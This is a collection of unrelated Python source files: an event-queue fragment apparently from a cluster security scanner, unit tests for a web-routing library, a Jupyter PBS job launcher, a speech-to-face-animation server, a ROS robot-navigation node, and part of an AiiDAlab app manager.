        """Class decorator: subscribe the decorated hunter class to *event*."""
        def wrapper(hook):
            self.subscribe_event(event, hook=hook, predicate=predicate)
            return hook
        return wrapper
    # wrapper takes care of the subscribe once mechanism
    def subscribe_once(self, event, hook=None, predicate=None):
        """Like subscribe, but the hunter unsubscribes itself on first instantiation."""
        def wrapper(hook):
            # installing a __new__ magic method on the hunter
            # which will remove the hunter from the list upon creation
            def __new__unsubscribe_self(self, cls):
                handler.hooks[event].remove((hook, predicate))
                return object.__new__(self)
            hook.__new__ = __new__unsubscribe_self
            self.subscribe_event(event, hook=hook, predicate=predicate)
            return hook
        return wrapper
    # getting uninstantiated event object
    def subscribe_event(self, event, hook=None, predicate=None):
        """Register *hook* (a hunter or filter class) for *event*, honouring config.active."""
        config = get_config()
        if ActiveHunter in hook.__mro__:
            # active hunters only run when active scanning is enabled
            if not config.active:
                return
            self.active_hunters[hook] = hook.__doc__
        elif HunterBase in hook.__mro__:
            self.passive_hunters[hook] = hook.__doc__
        if HunterBase in hook.__mro__:
            self.all_hunters[hook] = hook.__doc__
        # registering filters
        if EventFilterBase in hook.__mro__:
            if hook not in self.filters[event]:
                self.filters[event].append((hook, predicate))
                logger.debug(f"{hook} filter subscribed to {event}")
        # registering hunters
        elif hook not in self.hooks[event]:
            self.hooks[event].append((hook, predicate))
            logger.debug(f"{hook} subscribed to {event}")
    def apply_filters(self, event):
        """Pass *event* through every matching filter; returns the (possibly rewritten)
        event, or None if a filter discarded it."""
        # if filters are subscribed, apply them on the event
        for hooked_event in self.filters.keys():
            if hooked_event in event.__class__.__mro__:
                for filter_hook, predicate in self.filters[hooked_event]:
                    if predicate and not predicate(event):
                        continue
                    logger.debug(f"Event {event.__class__} filtered with {filter_hook}")
                    event = filter_hook(event).execute()
                    # if filter decided to remove event, returning None
                    if not event:
                        return None
        return event
    # getting instantiated event object
    def publish_event(self, event, caller=None):
        """Filter *event* and enqueue an instantiated hook for every matching subscriber."""
        config = get_config()
        # setting event chain
        if caller:
            event.previous = caller.event
            event.hunter = caller.__class__
        # applying filters on the event, before publishing it to subscribers.
        # if filter returned None, not proceeding to publish
        event = self.apply_filters(event)
        if event:
            # If event was rewritten, make sure it's linked to its parent ('previous') event
            if caller:
                event.previous = caller.event
                event.hunter = caller.__class__
            for hooked_event in self.hooks.keys():
                if hooked_event in event.__class__.__mro__:
                    for hook, predicate in self.hooks[hooked_event]:
                        if predicate and not predicate(event):
                            continue
                        if config.statistics and caller:
                            if Vulnerability in event.__class__.__mro__:
                                caller.__class__.publishedVulnerabilities += 1
                        logger.debug(f"Event {event.__class__} got published with {event}")
                        self.put(hook(event))
    # executes callbacks on dedicated thread as a daemon
    def worker(self):
        """Worker loop: pop queued hooks and execute them; exceptions are logged, never fatal."""
        while self.running:
            try:
                hook = self.get()
                logger.debug(f"Executing {hook.__class__} with {hook.event.__dict__}")
                hook.execute()
            except Exception as ex:
                logger.debug(ex, exc_info=True)
            finally:
                self.task_done()
        logger.debug("closing thread...")
    def notifier(self):
        """Debug helper thread: periodically logs how many queued tasks remain unfinished."""
        time.sleep(2)
        # should consider locking on unfinished_tasks
        while self.unfinished_tasks > 0:
            logger.debug(f"{self.unfinished_tasks} tasks left")
            time.sleep(3)
            if self.unfinished_tasks == 1:
                logger.debug("final hook is hanging")
    # stops execution of all daemons
    def free(self):
        """Stop the worker loops and drop any queued work."""
        self.running = False
        with self.mutex:
            self.queue.clear()
# module-level singleton bus; hunters import this to subscribe and publish events
handler = EventQueue(800)
|
test_tools.py | import unittest
from multiprocessing import Process
from threading import Thread
from lib.sushi.tools import HttpMethod
from lib.sushi.tools.utils import Query
from ..sushi.tools import parameter, expose, application
def pi():
    """Return a fixed approximation of π (no-argument fixture for the expose tests)."""
    return 3.1415
def square(x):
    """Return x squared (single-parameter fixture for the parameter decorator tests)."""
    return x * x
def pow(x, y):
    """Return x raised to the power y (two-parameter fixture for the decorator tests).

    Fix: the original body was ``return pow(x, y)`` — this definition shadows the
    builtin, so the call recursed into itself forever. Use exponentiation instead.
    """
    return x ** y
class TestParameter(unittest.TestCase):
    """Tests for the parameter decorator: params storage, typing, defaults and stacking."""
    def test_parameter_to_store_params_in_decorator(self):
        """A wrapped function records its declared query parameter (str by default)."""
        wrapped_square = parameter(name="x")(square)
        params = wrapped_square.params
        self.assertEqual(len(params), 1)
        self.assertEqual(params[0], Query(name="x", default=None, cls=str))
    def test_parameter_to_raise_error_if_param_unknown(self):
        """Declaring a parameter the function does not accept raises ValueError."""
        self.assertRaises(ValueError, parameter(name="y"), square)
    def test_parameter_to_store_params_in_decorator_with_type(self):
        wrapped_square = parameter(name="x", cls=int)(square)
        params = wrapped_square.params
        self.assertEqual(len(params), 1)
        self.assertEqual(params[0], Query(name="x", default=None, cls=int))
    def test_parameter_to_store_params_in_decorator_with_default(self):
        wrapped_square = parameter(name="x", default="y/m - c")(square)
        params = wrapped_square.params
        self.assertEqual(len(params), 1)
        self.assertEqual(params[0], Query(name="x", default="y/m - c", cls=str))
    def test_parameter_to_wrap_parameter_wrapped_function(self):
        """Stacked parameter decorators accumulate params in declaration order."""
        wrapped_pow = parameter(name="y", cls=int)(parameter(name="x", cls=int)(pow))
        params = wrapped_pow.params
        self.assertEqual(len(params), 2)
        self.assertEqual(params[0], Query(name="x", default=None, cls=int))
        self.assertEqual(params[1], Query(name="y", default=None, cls=int))
class TestExpose(unittest.TestCase):
    """Tests for the expose decorator: path, HTTP method and params wiring.

    Fix: replaced the deprecated ``assertEquals`` alias (removed in Python 3.12)
    with ``assertEqual`` throughout.
    """
    def test_expose_without_params(self):
        w = expose(path="/")(pi)
        self.assertEqual(w.path, "/")
        self.assertEqual(w.method, HttpMethod.GET)
        self.assertEqual(w.params, [])
        self.assertEqual(w.func, pi)
    def test_expose_without_params_with_method(self):
        w = expose(path="/pi", method=HttpMethod.POST)(pi)
        self.assertEqual(w.path, "/pi")
        self.assertEqual(w.method, HttpMethod.POST)
        self.assertEqual(w.params, [])
        self.assertEqual(w.func, pi)
    def test_expose_with_params_with_method(self):
        # expose over a parameter-wrapped function keeps the declared params
        w = expose(path="/square")(parameter(name="x")(square))
        self.assertEqual(w.path, "/square")
        self.assertEqual(w.method, HttpMethod.GET)
        self.assertEqual(w.params, [Query(name="x", default=None, cls=str)])
        self.assertEqual(w.func, square)
    def test_params_with_expose(self):
        # parameter() applied on top of expose() is an error
        self.assertRaises(ValueError, parameter(name="y"), expose(path="/square")(square))
@application()
class Simple(object):
    """Minimal sample app used by TestApplication: greets by name at '/'."""
    @expose("/")
    @parameter(name="name")
    def greet(self, name):
        return "Hello " + name
class TestApplication(unittest.TestCase):
    """End-to-end test: boots the Simple app in a child process and hits it over HTTP.

    Fix: replaced the deprecated ``assertEquals`` alias (removed in Python 3.12)
    with ``assertEqual``.
    """
    # NOTE(review): a lambda target is not picklable, so this breaks on platforms
    # whose default start method is "spawn" (Windows, recent macOS); confirm the
    # intended platforms use "fork"
    p = Process(target=lambda: Simple().run())
    @classmethod
    def setUpClass(cls):
        cls.p.start()
    @classmethod
    def tearDownClass(cls):
        cls.p.terminate()
    def test_simple_application(self):
        import urllib.request
        contents = urllib.request.urlopen("http://localhost:8080/_/health").read()
        self.assertEqual(contents, b'OK')
    def test_simple_application_method(self):
        import urllib.request
        contents = urllib.request.urlopen("http://localhost:8080/").read()
        self.assertEqual(contents, b'Hello')
|
telemetry_dashboard.py | from IPython.core.display import HTML
from IPython.display import display, Image
import ipywidgets as widgets
import subprocess
import threading
import time
import os
from .query_nodes import getFreeJobSlots
loader = '''<!DOCTYPE html>
<html>
<head>
<meta name="viewport" content="width=device-width, initial-scale=1">
<style>
.loader {
border: 16px solid #f3f3f3;
border-radius: 50%;
border-top: 16px solid #3498db;
width: 20px;
height: 20px;
-webkit-animation: spin 2s linear infinite; /* Safari */
animation: spin 2s linear infinite;
}
@-webkit-keyframes spin {
0% { -webkit-transform: rotate(0deg); }
100% { -webkit-transform: rotate(360deg); }
}
@keyframes spin {
0% { transform: rotate(0deg); }
100% { transform: rotate(360deg); }
}
</style>
</head>
<body>
<div class="loader"></div>{status}
</body>
</html>
'''
class DashboardLauncher():
    """Jupyter widget that submits a PBS batch job hosting a web dashboard and surfaces its URL.

    Shows start/stop buttons plus an HTML status area; tracks the job and
    extracts the dashboard link by shelling out to qstat/qpeek/qdel.
    """
    def __init__(self, command, search_url, display_name, duration, queue, node_property, one_use_token = False):
        # command: shell command that submits the batch job (e.g. a qsub invocation)
        # search_url: substring that identifies the dashboard URL in the job's output
        self.command = command
        self.pointer = search_url
        self.name = display_name
        self.duration = duration
        self.start_button = widgets.Button(description='Start Application', disabled=False, button_style='info')
        self.stop_button = widgets.Button(description='Stop Application', disabled=False, button_style='info')
        self.status = widgets.HTML(value='')
        self.one_use_token = one_use_token
        # if a job is already queued/running, attach to it instead of offering "start"
        prev_job, job_id = self.jobsRunning(queue)
        if prev_job == True:
            self.new_job = False
            self.jobid = job_id
            self.status.value = loader.replace('{status}', f"Loading {self.name}.<br>JOB ID = {self.jobid}")
            self.detectURL()
            self.display_box = widgets.VBox([self.stop_button, self.status])
        else:
            self.new_job = True
            self.display_box = widgets.VBox([self.start_button, self.status])
        def on_start_clicked(b):
            # refuse to submit when the cluster has no free slots for the required node property
            self.status.value = "Loading ..."
            queue_server = os.getenv('PBS_DEFAULT')
            match_properties = [node_property]
            available_slots, free_slots = getFreeJobSlots(queue_server, match_properties, verbose=False)
            if free_slots == 0 :
                self.status.value = f"All nodes are currently in use and the {display_name} cannot be launched at this time. Please try again in a few minutes."
                self.display_box.children = [self.start_button, self.status]
            else:
                self.new_job = True
                self.stop_button.disabled = False
                self.display_box.children = [self.stop_button, self.status]
                self.submitDashboardJob()
        def on_stop_clicked(b):
            self.stop_button.disabled = True
            self.cancelJob()
            self.status.value = f'{self.name} job terminated'
            self.display_box.children = [self.start_button, self.status]
        self.start_button.on_click(on_start_clicked)
        self.stop_button.on_click(on_stop_clicked)
        display(self.display_box)
    def jobsRunning(self, queue_name):
        """Return (True, job_id) if qstat reports a job in *queue_name*, else (False, "")."""
        command = f'qstat {queue_name}'
        p = subprocess.Popen(command, stdout=subprocess.PIPE, shell=True)
        output, error = p.communicate()
        jobs = output.decode("utf-8")
        if jobs == '':
            return False, ""
        else:
            # third line of qstat output holds the first job; the id precedes the first "."
            return True, jobs.rsplit("\n")[2].rsplit(".")[0]
    def submitDashboardJob(self):
        """Submit the batch job and start watching its output for the dashboard URL."""
        p = subprocess.Popen(self.command, stdout=subprocess.PIPE, shell=True)
        output, error = p.communicate()
        self.jobid = output.decode("utf-8").rstrip().split('.')[0]
        if self.jobid == "":
            self.status.value = f"<span style='color:red'>⚠</span> Launching {self.name} failed"
            self.display_box.children = [self.start_button, self.status]
            return
        else:
            self.status.value = loader.replace('{status}', f"Initializing and loading {self.name}. This will take approximately {self.duration}.<br>JOB ID = {self.jobid}")
            self.detectURL()
    def detectURL(self):
        """Poll qpeek on a background thread until the dashboard URL shows up, then render links."""
        op_cmd = [f'qpeek {self.jobid}']
        def _work():
            url_detected = False
            str_ = self.pointer
            while not url_detected:
                p = subprocess.Popen(op_cmd, stdout=subprocess.PIPE, shell=True)
                output,_ = p.communicate()
                output = output.decode().split('\n')
                time.sleep(3.0)
                if output == ['']:
                    # no job output yet: if the job also vanished from qstat the session died
                    p2 = subprocess.Popen([f'qstat {self.jobid}'], stdout=subprocess.PIPE, shell=True)
                    jobstatus,_ = p2.communicate()
                    if jobstatus == b'':
                        self.status.value = f'{self.name} session terminated'
                        self.display_box.children = [self.start_button, self.status]
                        return
                for x in output:
                    if str_ in x:
                        url_detected = True
                        url = x.rstrip()
                        # drop the one-use token for the "return to session" link
                        url_return = url.split("token")[0] if self.one_use_token else url
                        #if self.new_job == True:
                        #    self.redirectURL(url)
                        self.status.value = f'{self.name} successfully initialized.<br><a href="{url}" target="_blank">Launch {self.name} (for the first time).</a><br><a href="{url_return}" target="_blank">Return to {self.name} session (if previously closed).</a><br>JOB ID = {self.jobid}'
                        break
        thread = threading.Thread(target=_work, args=())
        thread.start()
    def redirectURL(self, URL):
        """Open *URL* in a new browser tab via injected JS (only within ~7 s of creation)."""
        self.time_created = time.time()*1000
        script = new_tab =f'''<script>
            var d = new Date();
            var time_now = d.getTime();
            var timeout = 7000;
            if (time_now - {self.time_created} < timeout) {{
                var win = window.open('{URL}', '_blank');
            }}
        </script>'''
        new_tab = HTML ('''{}'''.format(script))
        display(new_tab)
    def cancelJob(self):
        """qdel the job and spin until qstat confirms it is gone, updating the spinner."""
        status = loader.replace("{status}",f"Cancelling {self.name} job")
        cmd = f'qdel {self.jobid}'
        p = subprocess.Popen(cmd, stdout=subprocess.PIPE, shell=True)
        output, err = p.communicate()
        cmd = 'qstat '+self.jobid
        cancelled = False
        while not cancelled:
            self.status.value = status+f'<br>JOB ID = {self.jobid}'
            self.display_box.children = [self.stop_button, self.status]
            p = subprocess.Popen(cmd, stdout=subprocess.PIPE, shell=True)
            output,_ = p.communicate()
            # empty qstat output means the job no longer exists
            cancelled = True if output.decode().rstrip() == '' else False
            time.sleep(7.0)
        return
|
text2face.py | import os
import csv
import json
import numpy as np
import tensorflow as tf
from scipy.io import wavfile
from python_speech_features import mfcc
import eventlet
import socketio
import threading
from google.cloud import texttospeech
import base64
# Socket.IO server wrapped as a WSGI app; served by eventlet at module bottom
sio = socketio.Server()
app = socketio.WSGIApp(sio)
# latest console line awaiting synthesis; shared between the input thread and the worker
text = ""
@sio.event
def connect(sid, environ):
    """Socket.IO handler: log a newly connected client session."""
    print('connect', sid)
@sio.event
def chat(sid, data):
    """Socket.IO handler: broadcast an incoming chat message to all clients."""
    print('chat: ' + data)
    sio.emit('chat', data)
@sio.event
def disconnect(sid):
    """Socket.IO handler: log a client disconnect."""
    print('disconnect', sid)
def program():
    """Console reader loop: store each entered line in the shared global ``text``."""
    global text
    while True:
        text = str(input())
def text2face(text):
    """Synthesize speech for *text* and predict per-frame face blendshape weights.

    Returns (keyframes, filepath_high): keyframes is an array of blendshape rows
    (one per audio window, also dumped to a CSV next to the wav), filepath_high
    is the high-sample-rate wav produced by text2speech for playback.
    """
    filepath, filepath_high = text2speech(text) #"C:\\Users\\frank\\Desktop\\Uni\\HiWi\\sampled_test.wav"
    audio_fps = 8000
    audio_sample_size = int(audio_fps / 4) # 250ms

    def slideWindow(a, size, step):
        """Split *a* into windows of *size* samples advancing by *step*."""
        b = []
        i = 0
        pos = 0
        while pos + size < len(a):
            pos = int(i * step)
            b.append(a[pos : pos + size])
            i += 1
        return b

    def getAudio(path, size=audio_sample_size, step=1000):
        """Load a wav and return MFCC features per sliding window."""
        out = []
        sr, y = wavfile.read(path)
        samples = slideWindow(y, size, step)
        for sample in samples:
            out.append(mfcc(sample, audio_fps))
        print(path, sr, len(out))
        return out[:-1] # last one is not full

    model = tf.keras.models.load_model('AI\\speech2face_cnn')
    audio = getAudio(filepath, step=audio_sample_size)
    # fix: renamed from "input" to avoid shadowing the builtin; min-max normalise to [0, 1]
    features = np.asarray(audio)
    features = (features - np.min(features)) / np.ptp(features)
    decoded = model.predict(np.expand_dims(features, axis=3))
    keyframes = np.concatenate(decoded)
    blendshapes = ["jawOpen", "mouthClose", "mouthFunnel", "mouthPucker", "mouthRight", "mouthLeft", "mouthSmileRight", "mouthSmileLeft", "mouthFrownRight", "mouthFrownLeft", "mouthDimpleRight", "mouthDimpleLeft", "mouthStretchRight", "mouthStretchLeft", "mouthRollLower", "mouthRollUpper", "mouthShrugLower", "mouthShrugUpper", "mouthPressRight", "mouthPressLeft", "mouthLowerDownRight", "mouthLowerDownLeft", "mouthUpperUpRight"]
    # dump the predicted keyframes beside the wav for offline inspection
    with open(filepath + "-frames.csv", 'w', newline='') as csvfile:
        writer = csv.writer(csvfile)
        writer.writerow(blendshapes)
        for row in keyframes:
            writer.writerow(row)
    return (keyframes, filepath_high)
def text2speech(text):
    """Synthesize *text* with Google Cloud TTS into two wav files.

    Writes output.wav (default sample rate, for playback) and output_low.wav
    (8 kHz, matching the face model's expected audio rate).
    Returns ("output_low.wav", "output.wav").
    """
    os.environ["GOOGLE_APPLICATION_CREDENTIALS"] = "key.json"
    client = texttospeech.TextToSpeechClient()
    synthesis_input = texttospeech.SynthesisInput(text=text)
    voice = texttospeech.VoiceSelectionParams(
        language_code="de-DE", ssml_gender=texttospeech.SsmlVoiceGender.MALE
    )
    audio_config = texttospeech.AudioConfig(
        audio_encoding=texttospeech.AudioEncoding.LINEAR16,
        speaking_rate=0.8
    )
    # 8 kHz variant consumed by the face model (see audio_fps in text2face)
    audio_config_low = texttospeech.AudioConfig(
        audio_encoding=texttospeech.AudioEncoding.LINEAR16,
        sample_rate_hertz=8000,
        speaking_rate=0.8
    )
    response = client.synthesize_speech(
        input=synthesis_input, voice=voice, audio_config=audio_config
    )
    with open("output.wav", "wb") as out:
        out.write(response.audio_content)
        print('Audio content written to file "output.wav"')
    response_low = client.synthesize_speech(
        input=synthesis_input, voice=voice, audio_config=audio_config_low
    )
    with open("output_low.wav", "wb") as out:
        out.write(response_low.audio_content)
        print('Audio content written to file "output_low.wav"')
    return ("output_low.wav", "output.wav")
def readfile(path):
    """Return the entire contents of *path* as bytes."""
    with open(path, "rb") as handle:
        return handle.read()
def mat2string(mat):
    """Format a 2-D matrix as comma-separated 5-decimal rows joined by newlines (no trailing newline)."""
    rows = [",".join("%.5f" % value for value in row) for row in mat]
    return "\n".join(rows)
def worker():
    """Background task: when console input arrives, synthesize face+audio and emit to clients."""
    global text
    while True:
        if (text):
            sio.emit("chat", text)
            face, audio = text2face(text)
            face_enc = mat2string(face)
            audio_enc = readfile(audio)
            print("Sending face and audio data...")
            sio.emit('face', face_enc)
            sio.emit('audio', audio_enc)
            # clear the shared input so the next console line triggers a new run
            text = ""
        sio.sleep(1)
threading.Thread(target=program).start()
sio.start_background_task(worker)
eventlet.wsgi.server(eventlet.listen(('localhost', 8080)), app) |
move_closer.py | #!/usr/bin/env python
"""--------------------------------------------------------------------
Copyright (c) 2018, Kinova Robotics inc.
All rights reserved.
Redistribution and use in source and binary forms, with or without modification,
are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
* Neither the name of the copyright holder nor the names of its contributors
may be used to endorse or promote products derived from this software
without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR
CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
\Author Longfei Zhao
\brief Demo prepared for Movo2
\Platform: Ubuntu 16.04 LTS / ROS Kinetic
--------------------------------------------------------------------"""
import threading
import numpy
import rospy
from geometry_msgs.msg import Twist
from std_msgs.msg import String
from movo.system_defines import TRACTOR_REQUEST
from movo_msgs.msg import ConfigCmd
from movo_msgs.msg import FaceFound
from movo_action_clients.move_base_action_client import MoveBaseActionClient
from geometry_msgs.msg import Pose2D
class MoveCloser:
    """Drive the Movo base toward the nearest detected face.

    Subscribes to /face_detector/nearest_face, converts the first received
    face (pan/tilt/distance) into a 2D base target, and sends the base to a
    point ``_stop_dist`` meters in front of that face.
    """

    def __init__(self):
        # Distance (meters) to stop short of the detected face.
        self._stop_dist = 1.0
        is_sim = rospy.get_param("~sim", False)
        self._movo_base = MoveBaseActionClient(sim=is_sim, frame="odom")
        # Pose of the nearest face; written once by the subscriber callback
        # and read by the motion thread.  Guarded by _nearest_face_mutex.
        self._nearest_face = Pose2D(x=0.0, y=0.0, theta=0.0)
        self._has_pose_target = False
        self._nearest_face_mutex = threading.Lock()
        self._move_base_thread = threading.Thread(target=self._move_base_thread_cb)
        self._move_base_thread.start()
        self._nearest_face_sub = rospy.Subscriber(
            "/face_detector/nearest_face", FaceFound, self._nearest_face_cb
        )
        rospy.loginfo("Follow Me initialization finished")
        rospy.spin()

    def _nearest_face_cb(self, msg):
        """Update base target according to found nearest face (runs once)."""
        # run only once to update target pose
        if not self._has_pose_target:
            rospy.sleep(0.001)
            with self._nearest_face_mutex:
                # Project the face (pan/tilt/distance in the camera frame)
                # onto the base plane.
                self._nearest_face.x = msg.face_dist * numpy.cos(msg.tilt_pose) * numpy.cos(-msg.pan_pose)
                self._nearest_face.y = msg.face_dist * numpy.cos(msg.tilt_pose) * numpy.sin(-msg.pan_pose)
                # self._nearest_face.z = msg.face_dist * numpy.sin(msg.tilt_pose)
                self._nearest_face.theta = -msg.pan_pose
                # Publish the flag only after the pose is fully written.
                self._has_pose_target = True
            rospy.loginfo("[pan_pose, tilt_pose, dist_of_face] is [%f, %f, %f] " % (msg.pan_pose, msg.tilt_pose, msg.face_dist))
            self._nearest_face_sub.unregister()

    def _move_base_thread_cb(self):
        """Wait for a face target, then send a single base goal."""
        rate = rospy.Rate(10)
        while (not self._has_pose_target) and (not rospy.is_shutdown()):
            rospy.logdebug("wait for new target accepted ")
            rate.sleep()
        # BUGFIX: take the lock while reading the shared pose so this thread
        # can never observe a half-written target from _nearest_face_cb.
        with self._nearest_face_mutex:
            face = Pose2D(
                x=self._nearest_face.x,
                y=self._nearest_face.y,
                theta=self._nearest_face.theta,
            )
        # Stop _stop_dist meters short of the face, along its bearing.
        base_target = Pose2D(
            x=face.x - self._stop_dist * numpy.cos(face.theta),
            y=face.y - self._stop_dist * numpy.sin(face.theta),
            theta=face.theta,
        )
        rospy.loginfo("send movo base to [x, y, theta] is [%f, %f, %f] " % (base_target.x, base_target.y, base_target.theta))
        self._movo_base.goto(base_target)
        rospy.sleep(10.0)
if __name__ == "__main__":
    # BUGFIX: init_node must run before any rospy logging call; a loginfo
    # issued before node initialization is silently dropped by ROS.
    # rospy.init_node("move_closer", log_level=rospy.DEBUG)
    rospy.init_node("move_closer", log_level=rospy.INFO)
    rospy.loginfo("start Move Closer")
    MoveCloser()
|
app.py | # -*- coding: utf-8 -*-
"""Module to manage AiiDAlab apps."""
import re
import os
import shutil
import json
import errno
import logging
from collections import defaultdict
from contextlib import contextmanager
from enum import Enum, auto
from time import sleep
from threading import Thread
from subprocess import check_output, STDOUT
from dataclasses import dataclass, field, asdict
from urllib.parse import urlsplit, urldefrag
from typing import List, Dict
import traitlets
from dulwich.porcelain import fetch
from dulwich.errors import NotGitRepository
from dulwich.objects import Tag, Commit
from packaging.requirements import Requirement
from packaging.specifiers import SpecifierSet, InvalidSpecifier
from packaging.version import parse
from watchdog.observers import Observer
from watchdog.observers.polling import PollingObserver
from watchdog.events import FileSystemEventHandler
from .config import AIIDALAB_DEFAULT_GIT_BRANCH
from .git_util import GitManagedAppRepo as Repo
from .utils import throttled
from .utils import find_installed_packages
class AppNotInstalledException(Exception):
    """Raised when an operation requires the app to be installed locally."""

    pass
class AppRemoteUpdateError(RuntimeError):
    """Raised when the app's remote update status cannot be determined."""

    pass
# A version is usually of type str, but it can also be a value
# of this Enum to indicate special app states in which the
# version cannot be determined, e.g., because the app is in a
# detached state, or because the app is not installed at all.
class AppVersion(Enum):
    """Sentinel values for app states where no version string exists."""

    UNKNOWN = auto()
    NOT_INSTALLED = auto()
class AiidaLabAppWatch:
    """Watch to monitor the app installation status.

    Create a watch instance to monitor the installation status of an
    AiiDAlab app. This is achieved by monitoring the app repository
    for existence and changes.

    Arguments:
        app (AiidaLabApp):
            The AiidaLab app to monitor.
    """

    class AppPathFileSystemEventHandler(FileSystemEventHandler):
        """Internal event handler for app path file system events."""

        def __init__(self, app):
            self.app = app

        def on_any_event(self, event):
            """Refresh app for any event."""
            self.app.refresh_async()

    def __init__(self, app):
        self.app = app
        self._started = False
        self._monitor_thread = None
        self._observer = None

    def __repr__(self):
        return f"<{type(self).__name__}(app={self.app!r})>"

    def _start_observer(self):
        """Start the directory observer thread.

        The ._observer thread is controlled by the ._monitor_thread.
        """
        assert os.path.isdir(self.app.path)
        # BUGFIX: Thread.isAlive() was removed in Python 3.9; use is_alive().
        assert self._observer is None or not self._observer.is_alive()

        event_handler = self.AppPathFileSystemEventHandler(self.app)
        self._observer = Observer()
        self._observer.schedule(event_handler, self.app.path, recursive=True)
        try:
            self._observer.start()
        except OSError as error:
            if error.errno in (errno.ENOSPC, errno.EMFILE) and "inotify" in str(error):
                # We reached the inotify watch limit, using polling-based fallback observer.
                self._observer = PollingObserver()
                self._observer.schedule(event_handler, self.app.path, recursive=True)
                self._observer.start()
            else:  # reraise unrelated error
                raise error

    def _stop_observer(self):
        """Stop the directory observer thread.

        The ._observer thread is controlled by the ._monitor_thread.
        """
        assert self._observer is not None
        self._observer.stop()

    def start(self):
        """Watch the app repository for file system events.

        The app state is refreshed automatically for all events.
        """
        if self._started:
            raise RuntimeError(
                f"Instances of {type(self).__name__} can only be started once."
            )

        if self._monitor_thread is None:

            def check_path_exists_changed():
                """Poll for the app directory (dis)appearing; (re)start or stop the observer."""
                is_dir = os.path.isdir(self.app.path)
                while not self._monitor_thread.stop_flag:
                    switched = is_dir != os.path.isdir(self.app.path)
                    if switched:
                        is_dir = not is_dir
                        self.app.refresh()
                    if is_dir:
                        # BUGFIX: isAlive() -> is_alive() (removed in Py 3.9).
                        if self._observer is None or not self._observer.is_alive():
                            self._start_observer()
                    elif self._observer and self._observer.is_alive():
                        self._stop_observer()
                    sleep(1)

                # stop-flag set, stopping observer...
                if self._observer:
                    self._observer.stop()

            self._monitor_thread = Thread(target=check_path_exists_changed)
            self._monitor_thread.stop_flag = False
            self._monitor_thread.start()

        self._started = True

    def stop(self):
        """Stop watching the app repository for file system events."""
        if self._monitor_thread is not None:
            self._monitor_thread.stop_flag = True

    def is_alive(self):
        """Return True if this watch is still alive."""
        return self._monitor_thread and self._monitor_thread.is_alive()

    def join(self, timeout=None):
        """Join the watch after stopping.

        This function will timeout if a timeout argument is provided. Use the
        is_alive() function to determine whether the watch was stopped within
        the given timeout.
        """
        if self._monitor_thread is not None:
            self._monitor_thread.join(timeout=timeout)
class AiidaLabApp(traitlets.HasTraits):
"""Manage installation status of an AiiDAlab app.
Arguments:
name (str):
Name of the Aiida lab app.
app_data (dict):
Dictionary containing the app metadata.
aiidalab_apps_path (str):
Path to directory at which the app is expected to be installed.
watch (bool):
If true (default), automatically watch the repository for changes.
"""
# --- Traitlets exposed to the UI layer ---
# Absolute installation path of the app (None if unknown).
path = traitlets.Unicode(allow_none=True, readonly=True)
install_info = traitlets.Unicode()
# All installable versions compatible with this environment.
available_versions = traitlets.List(traitlets.Unicode)
# Either a 'git:...' version string or an AppVersion sentinel.
installed_version = traitlets.Union(
    [traitlets.Unicode(), traitlets.UseEnum(AppVersion)]
)
# allow_none=True traits use None to mean "indeterminate".
updates_available = traitlets.Bool(readonly=True, allow_none=True)
busy = traitlets.Bool(readonly=True)
detached = traitlets.Bool(readonly=True, allow_none=True)
compatible = traitlets.Bool(readonly=True, allow_none=True)
# Maps version specifier -> missing requirements (see _is_compatible).
compatibility_info = traitlets.Dict()
@dataclass
class AppRegistryData:
    """Dataclass that contains the app data from the app registry."""

    git_url: str
    meta_url: str
    categories: List[str]
    groups: List[str]  # appears to be a duplicate of categories?
    metainfo: Dict[str, str] = field(default_factory=dict)
    # Maps git refs (e.g. 'refs/heads/main') to commit shas.
    gitinfo: Dict[str, str] = field(default_factory=dict)
    # NOTE(review): defaults to None, so this is effectively Optional[str].
    hosted_on: str = None
class _GitReleaseLine:
    """Utility class to operate on the release line of the app.

    A release line is specified via the app url as part of the fragment (after '#').

    A release line can be specified either as
    a) a commit denoted by a hexadecimal number with either 20 or 40 digits, or
    b) a short reference, which can be either a branch or a tag name.

    A full ref is the ref as defined in the Git glossary, e.g., 'refs/heads/main'.
    A revision is either a full ref or a commit.
    """

    def __init__(self, app, line):
        self.app = app
        self.line = line
        # A string of 20 or 40 hex digits is interpreted as a commit,
        # anything else as a short ref (branch or tag name).
        match = re.fullmatch(
            r"(?P<commit>([0-9a-fA-F]{20}){1,2})|(?P<short_ref>.+)", line
        )
        if not match:
            raise ValueError(f"Illegal release line: {line}")
        self.commit = match.groupdict()["commit"]
        self.short_ref = match.groupdict()["short_ref"]
        assert self.commit or self.short_ref

    @property
    def _repo(self):
        # Local clone of the app; raises NotGitRepository when not cloned.
        return Repo(self.app.path)

    def _resolve_short_ref(self, short_ref):
        """Attempt to resolve the short-ref to a full ref.

        For example, 'branch' would be resolved to 'refs/heads/branch'
        if 'branch' is a local branch or 'refs/tags/branch' if it was
        a tag.

        This function returns None if the short-ref cannot be resolved
        to a full reference.
        """
        # Check if short-ref is among the remote refs:
        for ref in self._repo.refs.allkeys():
            if re.match(r"refs\/remotes\/(.*)?\/" + short_ref, ref.decode()):
                return ref
        # Check if short-ref is a head (branch):
        if f"refs/heads/{short_ref}".encode() in self._repo.refs.allkeys():
            return f"refs/heads/{short_ref}".encode()
        # Check if short-ref is a tag:
